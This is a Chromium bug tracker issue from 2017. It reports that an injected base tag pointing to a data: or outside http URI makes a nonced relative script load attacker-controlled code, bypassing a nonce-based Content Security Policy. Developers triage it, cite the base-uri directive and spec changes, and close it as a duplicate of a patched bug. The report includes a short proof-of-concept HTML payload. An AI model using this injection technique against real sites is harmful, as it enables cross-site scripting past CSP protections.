New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 689412 link

Starred by 3 users
Status: Duplicate
Merged: issue 679318
Owner:
mkwst@chromium.org
Buried. Ping if important.
Closed: Feb 2017
Cc:
a...@google.com
elawrence@chromium.org
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux , Android , Windows , Chrome , Mac
Pri: 2
Type: Feature



Sign in to add a comment

Bypass CSP nonce using base href="data:..."

Reported by masa....@gmail.com, Feb 7 2017 
UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36

Steps to reproduce the problem:
PoC:

<html>
<head>
<meta http-equiv=content-security-policy content="object-src 'none';script-src 'nonce-random-secret'">
<title> Fake XSS </title> </head>
<body>
<base href=data:/,-alert(1)/>
<script src="./lib/jquery.js" nonce=random-secret></script>
</body>
</html>

Online PoC: https://jsbin.com/vigodiqifo/1/edit?html,output

What is the expected behavior?
Will see alert box.

What went wrong?
Base uri changed script uri bypassed nonce prevent.

Did this work before? N/A 

Chrome version: 55.0.2883.95  Channel: n/a
OS Version: OS X 10.12.0
Flash Version: Shockwave Flash 24.0 r0

Comment 1 by elawrence@chromium.org, Feb 7 2017

Components: Blink>SecurityFeature
Labels: OS-Windows
Status: Untriaged (was: Unconfirmed)
Summary: Bypass CSP nonce using base href="data:..." (was: Bypass CSP nonce)
Repro's in 58.3005. Allowing Base URIs to use the DATA: protocol seems horrifying.

Comment 2 by jialiul@chromium.org, Feb 7 2017

Cc: elawrence@chromium.org
Labels: Security_Severity-Medium Security_Impact-Stable
Owner: mkwst@chromium.org
Status: Assigned (was: Untriaged)
Can be reproduced in current stable too. Adding security labels.
mkwst@, could you help triage this issue? Thanks!

Comment 3 by masa....@gmail.com, Feb 8 2017 

<base href=http://html5sec.org>,HTTP uri also work.

Comment 4 by mkwst@chromium.org, Feb 8 2017

Cc: a...@google.com
Labels: -Type-Bug-Security -Restrict-View-SecurityTeam OS-Android OS-Chrome OS-Linux Type-Feature
Yeah, I added metrics to M57 for exactly this case (which look pretty low), and filed https://github.com/whatwg/html/issues/2249 to see about changing the spec. Anne wasn't terribly impressed, but I think it's still a change worth making.

As for the `http` version, that's expected: if you care about preventing `<base>` injection, `base-uri` is there for you. I believe "Strict CSP" folks plan to add it to their recommendations. CCing Artur as an FYI.

Dropping visibility flags, as this is a known and public issue.

Comment 5 by a...@google.com, Feb 8 2017 

Yes, I also filed a bug for a documentation change in the spec to mention that base-uri is important for nonce-based policies:
https://github.com/w3c/webappsec-csp/issues/177

I'm planning to push a change to Google's public CSP documentation (csp.withgoogle.com) to mention this Real Soon Now.

Comment 6 by mkwst@chromium.org, Feb 14 2017

Mergedinto: 679318
Status: Duplicate (was: Assigned)
Duping this into 679318, where I landed a patch to prevent `data` from being used as a `<base href>`.

Sign in to add a comment